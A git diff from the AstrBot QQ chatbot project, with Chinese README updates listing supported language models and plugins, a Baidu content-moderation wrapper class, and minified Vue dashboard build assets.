- OpenAI GPT-4(原生支持)
|
||||
- Claude(免费,由[LLMs插件](https://github.com/Soulter/llms)支持)
|
||||
- HuggingChat(免费,由[LLMs插件](https://github.com/Soulter/llms)支持)
|
||||
- Gemini(免费,由[LLMs插件](https://github.com/Soulter/llms)支持)
|
||||
|
||||
**图片生成**
|
||||
- OpenAI Dalle 接口
|
||||
- NovelAI/Naifu (免费,由[AIDraw插件](https://github.com/Soulter/aidraw)支持)
|
||||
|
||||
🌍机器人支持的能力一览:
|
||||
- 可视化面板(beta)
|
||||
- 同时部署机器人到 QQ 和 QQ 频道
|
||||
- 大模型对话
|
||||
- 大模型网页搜索能力 **(目前仅支持OpenAI系模型,最新版本下使用 web on 指令打开)**
|
||||
- 插件(在QQ或QQ频道聊天框内输入 `plugin` 了解详情)
|
||||
- 回复文字图片渲染(以图片markdown格式回复,**大幅度降低被风控概率**,需手动在`cmd_config.json`内开启qq_pic_mode)
|
||||
- 人格设置
|
||||
- 关键词回复
|
||||
- 热更新(更新本项目时**仅需**在QQ或QQ频道聊天框内输入`update latest r`)
|
||||
- Windows一键部署 https://github.com/Soulter/QQChatGPTLauncher/releases/latest
|
||||
|
||||
<!--
|
||||
### 基本功能
|
||||
<details>
|
||||
<summary>✅ 回复符合上下文</summary>
|
||||
@@ -69,11 +119,37 @@
|
||||
|
||||
- QQ频道机器人框架为QQ官方开源的框架,稳定。
|
||||
|
||||
</details>
|
||||
</details> -->
|
||||
|
||||
> 关于token:token就相当于是AI中的单词数(但是不等于单词数),`text-davinci-003`模型中最大可以支持`4097`个token。在发送信息时,这个机器人会将用户的历史聊天记录打包发送给ChatGPT,因此,`token`也会相应的累加,为了保证聊天的上下文的逻辑性,就有了缓存token。
|
||||
### 指令功能
|
||||
需要先`@`机器人之后再输入指令
|
||||
<!-- > 关于token:token就相当于是AI中的单词数(但是不等于单词数),`text-davinci-003`模型中最大可以支持`4097`个token。在发送信息时,这个机器人会将用户的历史聊天记录打包发送给ChatGPT,因此,`token`也会相应的累加,为了保证聊天的上下文的逻辑性,就有了缓存token。 -->
|
||||
|
||||
### 🛠️ 插件支持
|
||||
|
||||
本项目支持接入插件。
|
||||
|
||||
> 使用`plugin i 插件GitHub链接`即可安装。
|
||||
|
||||
部分插件:
|
||||
|
||||
- `LLMS`: https://github.com/Soulter/llms | Claude, HuggingChat 大语言模型接入。
|
||||
|
||||
- `GoodPlugins`: https://github.com/Soulter/goodplugins | 随机动漫图片、搜番、喜报生成器等等
|
||||
|
||||
- `sysstat`: https://github.com/Soulter/sysstatqcbot | 查看系统状态
|
||||
|
||||
- `BiliMonitor`: https://github.com/Soulter/BiliMonitor | 订阅B站动态
|
||||
|
||||
- `liferestart`: https://github.com/Soulter/liferestart | 人生重开模拟器
|
||||
|
||||
|
||||
<img width="900" alt="image" src="https://github.com/Soulter/AstrBot/assets/37870767/824d1ff3-7b85-481c-b795-8e62dedb9fd7">
|
||||
|
||||
|
||||
<!--
|
||||
### 指令
|
||||
|
||||
#### OpenAI官方API
|
||||
在频道内需要先`@`机器人之后再输入指令;在QQ中暂时需要在消息前加上`ai `,不需要@
|
||||
- `/reset`重置prompt
|
||||
- `/his`查看历史记录(每个用户都有独立的会话)
|
||||
- `/his [页码数]`查看不同页码的历史记录。例如`/his 2`查看第2页
|
||||
@@ -83,33 +159,22 @@
|
||||
- `/help` 查看帮助
|
||||
- `/key` 动态添加key
|
||||
- `/set` 人格设置面板
|
||||
- `/keyword nihao 你好` 设置关键词回复。nihao->你好
|
||||
- `/画` 画画
|
||||
|
||||
## 📰使用方法:
|
||||
#### 逆向ChatGPT库语言模型
|
||||
- `/gpt` 切换为OpenAI官方API
|
||||
|
||||
**详细部署教程链接**https://soulter.top/posts/qpdg.html
|
||||
* 切换模型指令支持临时回复。如`/a 你好`将会临时使用一次bing模型 -->
|
||||
<!--
|
||||
## 🙇感谢
|
||||
|
||||
### 安装第三方库
|
||||
本项目使用了一下项目:
|
||||
|
||||
使用Python的pip工具安装
|
||||
- `qq-botpy` (QQ频道官方Python SDK)
|
||||
- `openai` (OpenAI Python SDK)
|
||||
[ChatGPT by acheong08](https://github.com/acheong08/ChatGPT)
|
||||
|
||||
```shell
|
||||
pip install -r requirements.txt
|
||||
```
|
||||
> ⚠注意,由于qq-botpy库需要运行在`Python 3.8+`的版本上,因此本项目也需要在此之上运行
|
||||
[EdgeGPT by acheong08](https://github.com/acheong08/EdgeGPT)
|
||||
|
||||
### 配置
|
||||
[go-cqhttp by Mrs4s](https://github.com/Mrs4s/go-cqhttp)
|
||||
|
||||
- 获得 OpenAI的key [OpenAI](https://beta.openai.com/)
|
||||
- 获得 QQ开放平台下QQ频道机器人的token和appid [QQ开放平台](https://q.qq.com/),一个QQ频道机器人(很容易创建~)
|
||||
- 在configs/config.yaml下进行配置
|
||||
|
||||
### 启动
|
||||
- 启动main.py
|
||||
|
||||
|
||||
## DEMO
|
||||

|
||||

|
||||

|
||||
[nakuru-project by Lxns-Network](https://github.com/Lxns-Network/nakuru-project) -->
|
||||
|
||||
29
addons/baidu_aip_judge.py
Normal file
@@ -0,0 +1,29 @@
|
||||
from aip import AipContentCensor
|
||||
|
||||
|
||||
class BaiduJudge:
|
||||
def __init__(self, baidu_configs) -> None:
|
||||
if 'app_id' in baidu_configs and 'api_key' in baidu_configs and 'secret_key' in baidu_configs:
|
||||
self.app_id = str(baidu_configs['app_id'])
|
||||
self.api_key = baidu_configs['api_key']
|
||||
self.secret_key = baidu_configs['secret_key']
|
||||
self.client = AipContentCensor(
|
||||
self.app_id, self.api_key, self.secret_key)
|
||||
else:
|
||||
raise ValueError("Baidu configs error! 请填写百度内容审核服务相关配置!")
|
||||
|
||||
def judge(self, text):
|
||||
res = self.client.textCensorUserDefined(text)
|
||||
if 'conclusionType' not in res:
|
||||
return False, "百度审核服务未知错误"
|
||||
if res['conclusionType'] == 1:
|
||||
return True, "合规"
|
||||
else:
|
||||
if 'data' not in res:
|
||||
return False, "百度审核服务未知错误"
|
||||
count = len(res['data'])
|
||||
info = f"百度审核服务发现 {count} 处违规:\n"
|
||||
for i in res['data']:
|
||||
info += f"{i['msg']};\n"
|
||||
info += "\n判断结果:"+res['conclusion']
|
||||
return False, info
|
||||
1
addons/dashboard/dist/_redirects
vendored
Normal file
@@ -0,0 +1 @@
|
||||
/* /index.html 200
|
||||
1
addons/dashboard/dist/assets/BaseBreadcrumb-4d676ba5.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.page-breadcrumb .v-toolbar{background:transparent}
|
||||
1
addons/dashboard/dist/assets/BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as i,o as l,c as _,w as s,a as e,f as a,J as m,V as c,b as t,t as u,ad as p,B as n,ae as o,j as f}from"./index-dc96e1be.js";const b={class:"text-h3"},h={class:"d-flex align-center"},g={class:"d-flex align-center"},V=i({__name:"BaseBreadcrumb",props:{title:String,breadcrumbs:Array,icon:String},setup(d){const r=d;return(x,B)=>(l(),_(c,{class:"page-breadcrumb mb-1 mt-1"},{default:s(()=>[e(a,{cols:"12",md:"12"},{default:s(()=>[e(m,{variant:"outlined",elevation:"0",class:"px-4 py-3 withbg"},{default:s(()=>[e(c,{"no-gutters":"",class:"align-center"},{default:s(()=>[e(a,{md:"5"},{default:s(()=>[t("h3",b,u(r.title),1)]),_:1}),e(a,{md:"7",sm:"12",cols:"12"},{default:s(()=>[e(p,{items:r.breadcrumbs,class:"text-h5 justify-md-end pa-1"},{divider:s(()=>[t("div",h,[e(n(o),{size:"17"})])]),prepend:s(()=>[e(f,{size:"small",icon:"mdi-home",class:"text-secondary mr-2"}),t("div",g,[e(n(o),{size:"17"})])]),_:1},8,["items"])]),_:1})]),_:1})]),_:1})]),_:1})]),_:1}))}});export{V as _};
|
||||
1
addons/dashboard/dist/assets/BlankLayout-1694b31c.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{x as e,o as a,c as t,w as o,a as s,B as n,Z as r,W as c}from"./index-dc96e1be.js";const f=e({__name:"BlankLayout",setup(p){return(u,_)=>(a(),t(c,null,{default:o(()=>[s(n(r))]),_:1}))}});export{f as default};
|
||||
1
addons/dashboard/dist/assets/ColorPage-757221a5.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as m}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as p,D as a,o as r,s,a as e,w as t,f as o,V as i,F as n,u as g,c as h,a0 as b,e as x,t as y}from"./index-dc96e1be.js";const P=p({__name:"ColorPage",setup(C){const c=a({title:"Colors Page"}),d=a([{title:"Utilities",disabled:!1,href:"#"},{title:"Colors",disabled:!0,href:"#"}]),u=a(["primary","lightprimary","secondary","lightsecondary","info","success","accent","warning","error","darkText","lightText","borderLight","inputBorder","containerBg"]);return(V,k)=>(r(),s(n,null,[e(m,{title:c.value.title,breadcrumbs:d.value},null,8,["title","breadcrumbs"]),e(i,null,{default:t(()=>[e(o,{cols:"12",md:"12"},{default:t(()=>[e(_,{title:"Color Palette"},{default:t(()=>[e(i,null,{default:t(()=>[(r(!0),s(n,null,g(u.value,(l,f)=>(r(),h(o,{md:"3",cols:"12",key:f},{default:t(()=>[e(b,{rounded:"md",class:"align-center justify-center d-flex",height:"100",width:"100%",color:l},{default:t(()=>[x("class: "+y(l),1)]),_:2},1032,["color"])]),_:2},1024))),128))]),_:1})]),_:1})]),_:1})]),_:1})],64))}});export{P as default};
|
||||
1
addons/dashboard/dist/assets/ConfigDetailCard-8467c848.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{o as l,s as o,u as c,c as n,w as u,Q as g,b as s,R as k,F as t,ab as h,O as p,t as m,a as V,ac as f,i as C,q as x,k as v,A as U}from"./index-dc96e1be.js";import{_ as w}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";const S={__name:"ConfigDetailCard",props:{config:Array},setup(d){return(y,B)=>(l(!0),o(t,null,c(d.config,r=>(l(),n(w,{key:r.name,title:r.name,style:{"margin-bottom":"16px"}},{default:u(()=>[g(s("a",null,"No data",512),[[k,d.config.length===0]]),(l(!0),o(t,null,c(r.body,e=>(l(),o(t,null,[e.config_type==="item"?(l(),o(t,{key:0},[e.val_type==="bool"?(l(),n(h,{key:0,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,color:"primary",inset:""},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="str"?(l(),n(p,{key:1,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="int"?(l(),n(p,{key:2,modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,label:e.name,hint:e.description,style:{"margin-bottom":"8px"},variant:"outlined"},null,8,["modelValue","onUpdate:modelValue","label","hint"])):e.val_type==="list"?(l(),o(t,{key:3},[s("span",null,m(e.name),1),V(f,{modelValue:e.value,"onUpdate:modelValue":a=>e.value=a,chips:"",clearable:"",label:"请添加",multiple:"","prepend-icon":"mdi-tag-multiple-outline"},{selection:u(({attrs:a,item:i,select:b,selected:_})=>[V(C,x(a,{"model-value":_,closable:"",onClick:b,"onClick:close":D=>y.remove(i)}),{default:u(()=>[s("strong",null,m(i),1)]),_:2},1040,["model-value","onClick","onClick:close"])]),_:2},1032,["modelValue","onUpdate:modelValue"])],64)):v("",!0)],64)):e.config_type==="divider"?(l(),n(U,{key:1,style:{"margin-top":"8px","margin-bottom":"8px"}})):v("",!0)],64))),256))]),_:2},1032,["title"]))),128))}};export{S as _};
|
||||
1
addons/dashboard/dist/assets/ConfigPage-164b73e7.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as y}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as h,o,c as u,w as t,a,a8 as b,b as c,K as x,e as f,t as g,G as V,A as w,L as S,a9 as $,J as B,s as _,d as v,F as d,u as p,f as G,V as T,aa as j,T as l}from"./index-dc96e1be.js";import{_ as m}from"./ConfigDetailCard-8467c848.js";const D={class:"d-sm-flex align-center justify-space-between"},C=h({__name:"ConfigGroupCard",props:{title:String},setup(e){const s=e;return(i,n)=>(o(),u(B,{variant:"outlined",elevation:"0",class:"withbg",style:{width:"50%"}},{default:t(()=>[a(b,{style:{padding:"10px 20px"}},{default:t(()=>[c("div",D,[a(x,null,{default:t(()=>[f(g(s.title),1)]),_:1}),a(V)])]),_:1}),a(w),a(S,null,{default:t(()=>[$(i.$slots,"default")]),_:3})]),_:3}))}}),I={style:{display:"flex","flex-direction":"row","justify-content":"space-between","align-items":"center","margin-bottom":"12px"}},N={style:{display:"flex","flex-direction":"row"}},R={style:{"margin-right":"10px",color:"black"}},F={style:{color:"#222"}},k=h({__name:"ConfigGroupItem",props:{title:String,desc:String,btnRoute:String,namespace:String},setup(e){const s=e;return(i,n)=>(o(),_("div",I,[c("div",N,[c("h3",R,g(s.title),1),c("p",F,g(s.desc),1)]),a(v,{to:s.btnRoute,color:"primary",class:"ml-2",style:{"border-radius":"10px"}},{default:t(()=>[f("配置")]),_:1},8,["to"])]))}}),L={style:{display:"flex","flex-direction":"row",padding:"16px",gap:"16px",width:"100%"}},P={name:"ConfigPage",components:{UiParentCard:y,ConfigGroupCard:C,ConfigGroupItem:k,ConfigDetailCard:m},data(){return{config_data:[],config_base:[],save_message_snack:!1,save_message:"",save_message_success:"",config_outline:[],namespace:""}},mounted(){this.getConfig()},methods:{switchConfig(e){l.get("/api/configs?namespace="+e).then(s=>{this.namespace=e,this.config_data=s.data.data,console.log(this.config_data)}).catch(s=>{save_message=s,save_message_snack=!0,save_message_success="error"})},getConfig(){l.get("/api/config_outline").then(e=>{this.config_outline=e.data.data,console.log(this.config_outline)}).catch(e=>{save_message=e,save_message_snack=!0,save_message_success="error"}),l.get("/api/configs").then(e=>{this.config_base=e.data.data,console.log(this.config_data)}).catch(e=>{save_message=e,save_message_snack=!0,save_message_success="error"})},updateConfig(){l.post("/api/configs",{base_config:this.config_base,config:this.config_data,namespace:this.namespace}).then(e=>{e.data.status==="success"?(this.save_message=e.data.message,this.save_message_snack=!0,this.save_message_success="success"):(this.save_message=e.data.message,this.save_message_snack=!0,this.save_message_success="error")}).catch(e=>{this.save_message=e,this.save_message_snack=!0,this.save_message_success="error"})}}},J=Object.assign(P,{setup(e){return(s,i)=>(o(),_(d,null,[a(T,null,{default:t(()=>[c("div",L,[(o(!0),_(d,null,p(s.config_outline,n=>(o(),u(C,{key:n.name,title:n.name},{default:t(()=>[(o(!0),_(d,null,p(n.body,r=>(o(),u(k,{title:r.title,desc:r.desc,namespace:r.namespace,onClick:U=>s.switchConfig(r.namespace)},null,8,["title","desc","namespace","onClick"]))),256))]),_:2},1032,["title"]))),128))]),a(G,{cols:"12",md:"12"},{default:t(()=>[a(m,{config:s.config_data},null,8,["config"]),a(m,{config:s.config_base},null,8,["config"])]),_:1})]),_:1}),a(v,{icon:"mdi-content-save",size:"x-large",style:{position:"fixed",right:"52px",bottom:"52px"},color:"darkprimary",onClick:s.updateConfig},null,8,["onClick"]),a(j,{timeout:2e3,elevation:"24",color:s.save_message_success,modelValue:s.save_message_snack,"onUpdate:modelValue":i[0]||(i[0]=n=>s.save_message_snack=n)},{default:t(()=>[f(g(s.save_message),1)]),_:1},8,["color","modelValue"])],64))}});export{J as default};
|
||||
11
addons/dashboard/dist/assets/ConsolePage-2b75b85a.js
vendored
Normal file
32
addons/dashboard/dist/assets/ConsolePage-ff373be6.css
vendored
Normal file
@@ -0,0 +1,32 @@
|
||||
/**
|
||||
* Copyright (c) 2014 The xterm.js authors. All rights reserved.
|
||||
* Copyright (c) 2012-2013, Christopher Jeffrey (MIT License)
|
||||
* https://github.com/chjj/term.js
|
||||
* @license MIT
|
||||
*
|
||||
* Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
* of this software and associated documentation files (the "Software"), to deal
|
||||
* in the Software without restriction, including without limitation the rights
|
||||
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
* copies of the Software, and to permit persons to whom the Software is
|
||||
* furnished to do so, subject to the following conditions:
|
||||
*
|
||||
* The above copyright notice and this permission notice shall be included in
|
||||
* all copies or substantial portions of the Software.
|
||||
*
|
||||
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
* THE SOFTWARE.
|
||||
*
|
||||
* Originally forked from (with the author's permission):
|
||||
* Fabrice Bellard's javascript vt100 for jslinux:
|
||||
* http://bellard.org/jslinux/
|
||||
* Copyright (c) 2011 Fabrice Bellard
|
||||
* The original design remains. The terminal itself
|
||||
* has been extended to include xterm CSI codes, among
|
||||
* other features.
|
||||
*/.xterm{cursor:text;position:relative;user-select:none;-ms-user-select:none;-webkit-user-select:none}.xterm.focus,.xterm:focus{outline:none}.xterm .xterm-helpers{position:absolute;top:0;z-index:5}.xterm .xterm-helper-textarea{padding:0;border:0;margin:0;position:absolute;opacity:0;left:-9999em;top:0;width:0;height:0;z-index:-5;white-space:nowrap;overflow:hidden;resize:none}.xterm .composition-view{background:#000;color:#fff;display:none;position:absolute;white-space:nowrap;z-index:1}.xterm .composition-view.active{display:block}.xterm .xterm-viewport{background-color:#000;overflow-y:scroll;cursor:default;position:absolute;right:0;left:0;top:0;bottom:0}.xterm .xterm-screen{position:relative}.xterm .xterm-screen canvas{position:absolute;left:0;top:0}.xterm .xterm-scroll-area{visibility:hidden}.xterm-char-measure-element{display:inline-block;visibility:hidden;position:absolute;top:0;left:-9999em;line-height:normal}.xterm.enable-mouse-events{cursor:default}.xterm.xterm-cursor-pointer,.xterm .xterm-cursor-pointer{cursor:pointer}.xterm.column-select.focus{cursor:crosshair}.xterm .xterm-accessibility,.xterm .xterm-message{position:absolute;left:0;top:0;bottom:0;right:0;z-index:10;color:transparent;pointer-events:none}.xterm .live-region{position:absolute;left:-9999px;width:1px;height:1px;overflow:hidden}.xterm-dim{opacity:1!important}.xterm-underline-1{text-decoration:underline}.xterm-underline-2{text-decoration:double underline}.xterm-underline-3{text-decoration:wavy underline}.xterm-underline-4{text-decoration:dotted underline}.xterm-underline-5{text-decoration:dashed underline}.xterm-overline{text-decoration:overline}.xterm-overline.xterm-underline-1{text-decoration:overline underline}.xterm-overline.xterm-underline-2{text-decoration:overline double underline}.xterm-overline.xterm-underline-3{text-decoration:overline wavy underline}.xterm-overline.xterm-underline-4{text-decoration:overline dotted underline}.xterm-overline.xterm-underline-5{text-decoration:overline dashed underline}.xterm-strikethrough{text-decoration:line-through}.xterm-screen .xterm-decoration-container .xterm-decoration{z-index:6;position:absolute}.xterm-screen .xterm-decoration-container .xterm-decoration.xterm-decoration-top-layer{z-index:7}.xterm-decoration-overview-ruler{z-index:8;position:absolute;top:0;right:0;pointer-events:none}.xterm-decoration-top{z-index:2;position:relative}
|
||||
1
addons/dashboard/dist/assets/DefaultDashboard-8752691b.js
vendored
Normal file
1
addons/dashboard/dist/assets/Error404Page-06f6396d.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as t}from"./_plugin-vue_export-helper-c27b6911.js";import{o,c,w as s,V as i,a as r,b as e,d as l,e as a,f as d}from"./index-dc96e1be.js";const n="/assets/img-error-bg-ab6474a0.svg",_="/assets/img-error-blue-2675a7a9.svg",m="/assets/img-error-text-a6aebfa0.svg",g="/assets/img-error-purple-edee3fbc.svg";const p={},u={class:"text-center"},f=e("div",{class:"CardMediaWrapper"},[e("img",{src:n,alt:"grid",class:"w-100"}),e("img",{src:_,alt:"grid",class:"CardMediaParts"}),e("img",{src:m,alt:"build",class:"CardMediaBuild"}),e("img",{src:g,alt:"build",class:"CardMediaBuild"})],-1),h=e("h1",{class:"text-h1"},"Something is wrong",-1),v=e("p",null,[e("small",null,[a("The page you are looking was moved, removed, "),e("br"),a("renamed, or might never exist! ")])],-1);function x(b,V){return o(),c(i,{"no-gutters":"",class:"h-100vh"},{default:s(()=>[r(d,{class:"d-flex align-center justify-center"},{default:s(()=>[e("div",u,[f,h,v,r(l,{variant:"flat",color:"primary",class:"mt-4",to:"/","prepend-icon":"mdi-home"},{default:s(()=>[a(" Home")]),_:1})])]),_:1})]),_:1})}const C=t(p,[["render",x]]);export{C as default};
|
||||
1
addons/dashboard/dist/assets/Error404Page-11cf087a.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.CardMediaWrapper{max-width:720px;margin:0 auto;position:relative}.CardMediaBuild{position:absolute;top:0;left:0;width:100%;animation:5s bounce ease-in-out infinite}.CardMediaParts{position:absolute;top:0;left:0;width:100%;animation:10s blink ease-in-out infinite}
|
||||
1
addons/dashboard/dist/assets/ExtensionPage-9b03c00a.js
vendored
Normal file
1
addons/dashboard/dist/assets/FullLayout-58c19404.js
vendored
Normal file
5
addons/dashboard/dist/assets/LoginPage-71a6cb60.js
vendored
Normal file
1
addons/dashboard/dist/assets/LoginPage-74e85ca7.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginForm .v-text-field .v-field--active input{font-weight:500}.loginBox{max-width:475px;margin:0 auto}
|
||||
1
addons/dashboard/dist/assets/LogoDark.vue_vue_type_script_setup_true_lang-7df35c25.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{av as _,x as d,D as n,o as c,s as m,a as f,w as p,Q as r,b as a,R as o,B as t,aw as h}from"./index-dc96e1be.js";const s={Sidebar_drawer:!0,Customizer_drawer:!1,mini_sidebar:!1,fontTheme:"Roboto",inputBg:!1},l=_({id:"customizer",state:()=>({Sidebar_drawer:s.Sidebar_drawer,Customizer_drawer:s.Customizer_drawer,mini_sidebar:s.mini_sidebar,fontTheme:"Poppins",inputBg:s.inputBg}),getters:{},actions:{SET_SIDEBAR_DRAWER(){this.Sidebar_drawer=!this.Sidebar_drawer},SET_MINI_SIDEBAR(e){this.mini_sidebar=e},SET_FONT(e){this.fontTheme=e}}}),u={class:"logo",style:{display:"flex","align-items":"center"}},b={style:{"font-size":"24px","font-weight":"1000"}},w={style:{"font-size":"20px","font-weight":"1000"}},S={style:{"font-size":"20px"}},z=d({__name:"LogoDark",setup(e){n("rgb(var(--v-theme-primary))"),n("rgb(var(--v-theme-secondary))");const i=l();return(g,B)=>(c(),m("div",u,[f(t(h),{to:"/",style:{"text-decoration":"none",color:"black"}},{default:p(()=>[r(a("span",b,"AstrBot 仪表盘",512),[[o,!t(i).mini_sidebar]]),r(a("span",w,"Astr",512),[[o,t(i).mini_sidebar]]),r(a("span",S,"Bot",512),[[o,t(i).mini_sidebar]])]),_:1})]))}});export{z as _,l as u};
|
||||
1
addons/dashboard/dist/assets/MaterialIcons-fc2671ff.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as o}from"./BaseBreadcrumb.vue_vue_type_style_index_0_lang-e31f96f8.js";import{_ as i}from"./UiParentCard.vue_vue_type_script_setup_true_lang-f2b2db58.js";import{x as n,D as a,o as c,s as m,a as e,w as t,f as d,b as f,V as _,F as u}from"./index-dc96e1be.js";const p=["innerHTML"],v=n({__name:"MaterialIcons",setup(b){const s=a({title:"Material Icons"}),r=a('<iframe src="https://materialdesignicons.com/" frameborder="0" width="100%" height="1000"></iframe>'),l=a([{title:"Icons",disabled:!1,href:"#"},{title:"Material Icons",disabled:!0,href:"#"}]);return(h,M)=>(c(),m(u,null,[e(o,{title:s.value.title,breadcrumbs:l.value},null,8,["title","breadcrumbs"]),e(_,null,{default:t(()=>[e(d,{cols:"12",md:"12"},{default:t(()=>[e(i,{title:"Material Icons"},{default:t(()=>[f("div",{innerHTML:r.value},null,8,p)]),_:1})]),_:1})]),_:1})],64))}});export{v as default};
|
||||
1
addons/dashboard/dist/assets/RegisterPage-03654257.js
vendored
Normal file
@@ -0,0 +1 @@
|
||||
import{_ as B}from"./LogoDark.vue_vue_type_script_setup_true_lang-7df35c25.js";import{x as y,D as o,o as b,s as U,a as e,w as a,b as n,B as $,d as u,f as d,A as _,e as f,V as r,O as m,ap as A,au as E,F,c as T,N as q,J as V,L as P}from"./index-dc96e1be.js";const z="/assets/social-google-a359a253.svg",N=["src"],S=n("span",{class:"ml-2"},"Sign up with Google",-1),D=n("h5",{class:"text-h5 text-center my-4 mb-8"},"Sign up with Email address",-1),G={class:"d-sm-inline-flex align-center mt-2 mb-7 mb-sm-0 font-weight-bold"},L=n("a",{href:"#",class:"ml-1 text-lightText"},"Terms and Condition",-1),O={class:"mt-5 text-right"},j=y({__name:"AuthRegister",setup(w){const c=o(!1),i=o(!1),p=o(""),v=o(""),g=o(),h=o(""),x=o(""),k=o([s=>!!s||"Password is required",s=>s&&s.length<=10||"Password must be less than 10 characters"]),C=o([s=>!!s||"E-mail is required",s=>/.+@.+\..+/.test(s)||"E-mail must be valid"]);function R(){g.value.validate()}return(s,l)=>(b(),U(F,null,[e(u,{block:"",color:"primary",variant:"outlined",class:"text-lightText googleBtn"},{default:a(()=>[n("img",{src:$(z),alt:"google"},null,8,N),S]),_:1}),e(r,null,{default:a(()=>[e(d,{class:"d-flex align-center"},{default:a(()=>[e(_,{class:"custom-devider"}),e(u,{variant:"outlined",class:"orbtn",rounded:"md",size:"small"},{default:a(()=>[f("OR")]),_:1}),e(_,{class:"custom-devider"})]),_:1})]),_:1}),D,e(E,{ref_key:"Regform",ref:g,"lazy-validation":"",action:"/dashboards/analytical",class:"mt-7 loginForm"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:h.value,"onUpdate:modelValue":l[0]||(l[0]=t=>h.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Firstname"},null,8,["modelValue"])]),_:1}),e(d,{cols:"12",sm:"6"},{default:a(()=>[e(m,{modelValue:x.value,"onUpdate:modelValue":l[1]||(l[1]=t=>x.value=t),density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary",label:"Lastname"},null,8,["modelValue"])]),_:1})]),_:1}),e(m,{modelValue:v.value,"onUpdate:modelValue":l[2]||(l[2]=t=>v.value=t),rules:C.value,label:"Email Address / Username",class:"mt-4 mb-4",required:"",density:"comfortable","hide-details":"auto",variant:"outlined",color:"primary"},null,8,["modelValue","rules"]),e(m,{modelValue:p.value,"onUpdate:modelValue":l[3]||(l[3]=t=>p.value=t),rules:k.value,label:"Password",required:"",density:"comfortable",variant:"outlined",color:"primary","hide-details":"auto","append-icon":i.value?"mdi-eye":"mdi-eye-off",type:i.value?"text":"password","onClick:append":l[4]||(l[4]=t=>i.value=!i.value),class:"pwdInput"},null,8,["modelValue","rules","append-icon","type"]),n("div",G,[e(A,{modelValue:c.value,"onUpdate:modelValue":l[5]||(l[5]=t=>c.value=t),rules:[t=>!!t||"You must agree to continue!"],label:"Agree with?",required:"",color:"primary",class:"ms-n2","hide-details":""},null,8,["modelValue","rules"]),L]),e(u,{color:"secondary",block:"",class:"mt-2",variant:"flat",size:"large",onClick:l[6]||(l[6]=t=>R())},{default:a(()=>[f("Sign Up")]),_:1})]),_:1},512),n("div",O,[e(_),e(u,{variant:"plain",to:"/auth/login",class:"mt-2 text-capitalize mr-n2"},{default:a(()=>[f("Already have an account?")]),_:1})])],64))}});const I={class:"pa-7 pa-sm-12"},J=n("h2",{class:"text-secondary text-h2 mt-8"},"Sign up",-1),Y=n("h4",{class:"text-disabled text-h4 mt-3"},"Enter credentials to continue",-1),M=y({__name:"RegisterPage",setup(w){return(c,i)=>(b(),T(r,{class:"h-100vh","no-gutters":""},{default:a(()=>[e(d,{cols:"12",class:"d-flex align-center bg-lightprimary"},{default:a(()=>[e(q,null,{default:a(()=>[n("div",I,[e(r,{justify:"center"},{default:a(()=>[e(d,{cols:"12",lg:"10",xl:"6",md:"7"},{default:a(()=>[e(V,{elevation:"0",class:"loginBox"},{default:a(()=>[e(V,{variant:"outlined"},{default:a(()=>[e(P,{class:"pa-9"},{default:a(()=>[e(r,null,{default:a(()=>[e(d,{cols:"12",class:"text-center"},{default:a(()=>[e(B),J,Y]),_:1})]),_:1}),e(j)]),_:1})]),_:1})]),_:1})]),_:1})]),_:1})])]),_:1})]),_:1})]),_:1}))}});export{M as default};
|
||||
1
addons/dashboard/dist/assets/RegisterPage-799ed804.css
vendored
Normal file
@@ -0,0 +1 @@
|
||||
.custom-devider{border-color:#00000014!important}.googleBtn{border-color:#00000014;margin:30px 0 20px}.outlinedInput .v-field{border:1px solid rgba(0,0,0,.08);box-shadow:none}.orbtn{padding:2px 40px;border-color:#00000014;margin:20px 15px}.pwdInput{position:relative}.pwdInput .v-input__append{position:absolute;right:10px;top:50%;transform:translateY(-50%)}.loginBox{max-width:475px;margin:0 auto}
|
